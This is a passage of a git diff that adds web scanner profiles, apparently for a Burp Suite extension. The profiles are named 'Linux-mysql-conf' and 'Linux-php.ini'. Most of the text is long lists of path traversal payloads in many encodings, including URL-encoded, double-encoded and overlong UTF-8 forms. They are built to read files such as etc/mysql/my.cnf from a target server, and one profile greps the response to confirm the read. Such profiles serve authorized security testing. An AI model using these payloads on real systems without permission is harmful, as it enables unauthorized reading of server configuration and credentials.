+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,MySQL database server"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-mysql-conf",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/mysql/my.cnf",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-php.ini.bb b/profiles/Linux-php.ini.bb
index c9c91e2..9c9198e 100755
--- a/profiles/Linux-php.ini.bb
+++ b/profiles/Linux-php.ini.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-php.ini","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{